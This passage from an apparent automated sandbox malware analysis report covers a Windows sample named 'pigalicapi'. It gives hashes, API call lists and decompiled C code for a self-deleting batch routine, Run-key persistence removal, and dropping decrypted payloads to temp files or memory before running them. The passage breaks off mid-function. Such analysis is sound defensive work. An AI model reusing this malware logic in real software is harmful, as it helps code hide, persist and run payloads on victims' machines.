                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1426ed85dea1b80a2d87683ddc20e304a9fca7b94a744c756eec17a22ef716e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23510CB5E40209EFEF08CF94C895FAEB7B9BF48705F108549E915AB281D774A941CF60
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0040D54F
                                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32 ref: 0040D55F
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0040D568
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32 ref: 0040D579
                                                                                                                                                                                                                                                                                                        • abort.MSVCRT ref: 0040D582
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 520269711-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: fd9db7f0874483d10b200add315514f979aa86a3b60fb29af93f5c95035f5732
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9824e27efd6e7c83b31d16d0cbecc9548462bee31ea0de24143adee51b232729
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd9db7f0874483d10b200add315514f979aa86a3b60fb29af93f5c95035f5732
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8901ACB4A04304DFD710EF79EA495597BF0FB04304F818939ED9997220E7B45556CF8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0040D54F
                                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32 ref: 0040D55F
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0040D568
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32 ref: 0040D579
                                                                                                                                                                                                                                                                                                        • abort.MSVCRT ref: 0040D582
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 520269711-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dc419f05c78df07fc1028f6fa8ebfa857d173d53209bdf56c34a1317ca656444
                                                                                                                                                                                                                                                                                                        • Instruction ID: 01619bb876d6b6a6ce0892675db8caf066cd75de0a22c9d772086659f3caa19f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc419f05c78df07fc1028f6fa8ebfa857d173d53209bdf56c34a1317ca656444
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F701A8B4A04304DFD710EF7AEA495597BF0FB04304F818A39ED8997220E7B85556CF8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                                                                                                                        			E024E74A0() {
                                                                                                                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                                                                                                                        				CHAR* _v528;
                                                                                                                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                                                                                                                        				void* _v536;
                                                                                                                                                                                                                                                                                                        				void* _v540;
                                                                                                                                                                                                                                                                                                        				char _v1060;
                                                                                                                                                                                                                                                                                                        				char _v1580;
                                                                                                                                                                                                                                                                                                        				char _v2364;
                                                                                                                                                                                                                                                                                                        				long _v2368;
                                                                                                                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                                                        				long _v2388;
                                                                                                                                                                                                                                                                                                        				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                                                                                                                        				void* _t121;
                                                                                                                                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                                                                                                                                        				void* _t124;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				E024E7D20(E024E7D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                                                        				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                                                        				 *0x24f4370 = 1;
                                                                                                                                                                                                                                                                                                        				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                                        				if(( *0x24f4362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v2368 = 0x207;
                                                                                                                                                                                                                                                                                                        					if(( *0x24f435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                                                        					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                                                        					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                                                        				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                                                        				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                                                        				if( *0x24f436c != 0) {
                                                                                                                                                                                                                                                                                                        					_t86 =  *0x24f436c; // 0x2ec
                                                                                                                                                                                                                                                                                                        					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                                                        				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                                                        				if(( *0x24f435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v536 = 0;
                                                                                                                                                                                                                                                                                                        				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                                                        					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                                                        					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(( *0x24f435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					E024E5E30(1);
                                                                                                                                                                                                                                                                                                        					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                                                        				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                                                        				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                                                        				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                                        				_v540 = _t71;
                                                                                                                                                                                                                                                                                                        				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					_v2388 = 0;
                                                                                                                                                                                                                                                                                                        					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                                                        					E024E7D20(E024E7D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                                                        					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                                                        					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                                                        					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                                                        					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                                                        						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					ExitProcess(0);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t71;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x024e74cd
                                                                                                                                                                                                                                                                                                        0x024e74d2
                                                                                                                                                                                                                                                                                                        0x024e74d5
                                                                                                                                                                                                                                                                                                        0x024e74e4
                                                                                                                                                                                                                                                                                                        0x024e74f3
                                                                                                                                                                                                                                                                                                        0x024e750b
                                                                                                                                                                                                                                                                                                        0x024e751e
                                                                                                                                                                                                                                                                                                        0x024e7547
                                                                                                                                                                                                                                                                                                        0x024e7520
                                                                                                                                                                                                                                                                                                        0x024e752e
                                                                                                                                                                                                                                                                                                        0x024e752e
                                                                                                                                                                                                                                                                                                        0x024e7559
                                                                                                                                                                                                                                                                                                        0x024e756b
                                                                                                                                                                                                                                                                                                        0x024e757d
                                                                                                                                                                                                                                                                                                        0x024e74f5
                                                                                                                                                                                                                                                                                                        0x024e7503
                                                                                                                                                                                                                                                                                                        0x024e7503
                                                                                                                                                                                                                                                                                                        0x024e758f
                                                                                                                                                                                                                                                                                                        0x024e75b4
                                                                                                                                                                                                                                                                                                        0x024e75ba
                                                                                                                                                                                                                                                                                                        0x024e75c4
                                                                                                                                                                                                                                                                                                        0x024e75c8
                                                                                                                                                                                                                                                                                                        0x024e75ce
                                                                                                                                                                                                                                                                                                        0x024e75ce
                                                                                                                                                                                                                                                                                                        0x024e75d4
                                                                                                                                                                                                                                                                                                        0x024e75de
                                                                                                                                                                                                                                                                                                        0x024e75f1
                                                                                                                                                                                                                                                                                                        0x024e75f3
                                                                                                                                                                                                                                                                                                        0x024e75f3
                                                                                                                                                                                                                                                                                                        0x024e75fd
                                                                                                                                                                                                                                                                                                        0x024e7628
                                                                                                                                                                                                                                                                                                        0x024e7636
                                                                                                                                                                                                                                                                                                        0x024e7643
                                                                                                                                                                                                                                                                                                        0x024e7643
                                                                                                                                                                                                                                                                                                        0x024e7652
                                                                                                                                                                                                                                                                                                        0x024e7656
                                                                                                                                                                                                                                                                                                        0x024e765b
                                                                                                                                                                                                                                                                                                        0x024e765b
                                                                                                                                                                                                                                                                                                        0x024e766f
                                                                                                                                                                                                                                                                                                        0x024e7698
                                                                                                                                                                                                                                                                                                        0x024e76aa
                                                                                                                                                                                                                                                                                                        0x024e76c6
                                                                                                                                                                                                                                                                                                        0x024e76cc
                                                                                                                                                                                                                                                                                                        0x024e76d9
                                                                                                                                                                                                                                                                                                        0x024e76df
                                                                                                                                                                                                                                                                                                        0x024e770e
                                                                                                                                                                                                                                                                                                        0x024e773f
                                                                                                                                                                                                                                                                                                        0x024e7747
                                                                                                                                                                                                                                                                                                        0x024e775a
                                                                                                                                                                                                                                                                                                        0x024e7762
                                                                                                                                                                                                                                                                                                        0x024e7794
                                                                                                                                                                                                                                                                                                        0x024e779d
                                                                                                                                                                                                                                                                                                        0x024e779d
                                                                                                                                                                                                                                                                                                        0x024e77a5
                                                                                                                                                                                                                                                                                                        0x024e77a5
                                                                                                                                                                                                                                                                                                        0x024e77ae

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 024E74E4
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 024E7503
                                                                                                                                                                                                                                                                                                        • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 024E752E
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,024EC650), ref: 024E7559
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,pigalicapi), ref: 024E756B
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,.exe), ref: 024E757D
                                                                                                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 024E758F
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 024E75B4
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(000002EC,00000001), ref: 024E75CE
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,024EC690,00000000,00000002,00000000), ref: 024E7620
                                                                                                                                                                                                                                                                                                        • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 024E7636
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 024E7643
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 024E766F
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 024E767C
                                                                                                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 024E7698
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,.bat), ref: 024E76AA
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 024E76C6
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000), ref: 024E76F9
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(000000FF,?,00000000), ref: 024E770E
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 024E771B
                                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 024E778C
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 024E779D
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 024E77A5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
                                                                                                                                                                                                                                                                                                        • API String ID: 3221898725-336785456
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0af1d8a2977741d3b11839dc8ac6c0b49b4361d4bbceaab56c6db5e7dd1f7488
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8d6efd7f7dc05c84430c69b8b448459f2845102230bf1f0d391c4e3a8982317d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0af1d8a2977741d3b11839dc8ac6c0b49b4361d4bbceaab56c6db5e7dd1f7488
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 677177B1E80318EBFF64DBA0DC89FEA7775AB44705F04498AF30A99182DBB45694CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                        			E024E6DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                                                        				long _v44;
                                                                                                                                                                                                                                                                                                        				void* _v48;
                                                                                                                                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                                                                                                                                        				void* _v56;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				void* _v328;
                                                                                                                                                                                                                                                                                                        				char _v340;
                                                                                                                                                                                                                                                                                                        				char _v604;
                                                                                                                                                                                                                                                                                                        				long _v608;
                                                                                                                                                                                                                                                                                                        				int _v612;
                                                                                                                                                                                                                                                                                                        				long _v616;
                                                                                                                                                                                                                                                                                                        				void* _v620;
                                                                                                                                                                                                                                                                                                        				long _v624;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v628;
                                                                                                                                                                                                                                                                                                        				void* _v632;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t198;
                                                                                                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                                                        				void* _t223;
                                                                                                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                                                        				void* _t347;
                                                                                                                                                                                                                                                                                                        				void* _t349;
                                                                                                                                                                                                                                                                                                        				void* _t350;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_v8 == 0) {
                                                                                                                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                                                        				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                                        				_v32 =  *_v8;
                                                                                                                                                                                                                                                                                                        				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                                                        				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                                                        				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                                                        				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                                                        				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                        					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                                                        					E024E7D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                                                        					E024E9730( &_v340, 4);
                                                                                                                                                                                                                                                                                                        					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                                                        					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                                                        					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                                        					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        						_v608 = 0;
                                                                                                                                                                                                                                                                                                        						_v612 = 0;
                                                                                                                                                                                                                                                                                                        						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                                                        						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                                                        							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        							if(_v620 != 0) {
                                                                                                                                                                                                                                                                                                        								if(E024E6260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                                                        									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                                                        									_v616 = _v624;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v328);
                                                                                                                                                                                                                                                                                                        						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                                                        							_t198 = E024E1E60( &_v324);
                                                                                                                                                                                                                                                                                                        							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                                                                        							_v628 = _t198;
                                                                                                                                                                                                                                                                                                        							if(_v628 != 0) {
                                                                                                                                                                                                                                                                                                        								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                                        									E024E73C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                                        									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        									E024E2510(_v628, 0x24ee290);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                                                                                                                        					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                                        					goto L39;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                                                                                                                        				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        					_t217 = E024E2070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                                                        					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                                        					_v40 = _t217;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                                                        					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        					if(_v48 != 0) {
                                                                                                                                                                                                                                                                                                        						if(E024E6260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                                                        							_t248 = E024E2070(_v48);
                                                                                                                                                                                                                                                                                                        							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                                        							_v40 = _t248;
                                                                                                                                                                                                                                                                                                        							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                                        								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        								E024E7B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                                                        								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_v40 == 0) {
                                                                                                                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                                                                                                                        					goto L38;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                                        						E024E73C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                                        						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                                        						_t223 = E024E97A0(0x10);
                                                                                                                                                                                                                                                                                                        						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                                        						_v632 = _t223;
                                                                                                                                                                                                                                                                                                        						_v52 = _v632;
                                                                                                                                                                                                                                                                                                        						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                                                        							if( *_v52 != 0) {
                                                                                                                                                                                                                                                                                                        								E024E7B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                                        								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                                        								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *_v52 = _v36;
                                                                                                                                                                                                                                                                                                        							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                                                        							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                                                        							_v56 = CreateThread(0, 0, E024E77B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v56);
                                                                                                                                                                                                                                                                                                        						}
